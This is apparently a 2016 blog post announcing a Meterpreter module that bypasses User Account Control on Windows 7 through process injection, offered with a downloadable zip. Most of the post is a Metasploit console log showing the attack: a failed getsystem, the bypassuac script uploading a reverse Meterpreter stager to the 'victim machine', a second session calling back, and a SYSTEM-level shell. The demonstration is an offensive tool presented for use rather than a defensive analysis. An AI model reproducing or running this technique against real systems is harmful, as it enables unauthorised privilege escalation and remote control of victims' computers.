Fork me on GitHub

четвъртък, 10 ноември 2016 г.

Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module

Here is a nice new addition to bypass UAC through meterpreter. It all came about when Kevin Mitnick was on a pentest and needed to bypass Windows 7 UAC. We stumbled upon an old post from Leo Davidson ( on bypassing Windows UAC. This method takes advantage of process injection that has a trusted Windows Publisher Certificate (example explorer.exe which runs at medium integrity). This is fully functioning on both x86/64 bit platforms. Source code is in the zip along with the meterpreter plugin.

Bypassing Windows 7 UAC Restrictions on a fully... by nu11secur1ty

 [*] Sending stage (749056 bytes) to  
 [*] Meterpreter session 1 opened ( -> at Fri Dec 31 20:43:24 -0500 2010  
 msf exploit(handler) > sessions -i 1  
 [*] Starting interaction with 1…  
 meterpreter > getsystem  
 [-] priv_elevate_getsystem: Operation failed: Access is denied.  
 meterpreter > run bypassuac  
 [*] Creating a reverse meterpreter stager: LHOST= LPORT=4546  
 [*] Running payload handler  
 [*] Uploading Windows UACBypass to victim machine.  
 [*] Bypassing UAC Restrictions on the system….  
 [*] Meterpreter stager executable 73802 bytes long  
 [*] Uploaded the agent to the filesystem….  
 [*] Executing the agent with endpoint with UACBypass in effect…  
 meterpreter > [*] Meterpreter session 2 opened ( -> at Fri Dec 31 20:43:40 -0500 2010  
 meterpreter >  
 Background session 1? [y/N]  
 msf exploit(handler) > sessions -i 2  
 [*] Starting interaction with 2…  
 meterpreter > getsystem  
 …got system (via technique 1).  
 meterpreter > shell  
 Process 416 created.  
 Channel 1 created.  
 Microsoft Windows [Version 6.1.7600]  
 Copyright (c) 2009 Microsoft Corporation. All rights reserved.  
 nt authoritysystem  

Няма коментари:

Публикуване на коментар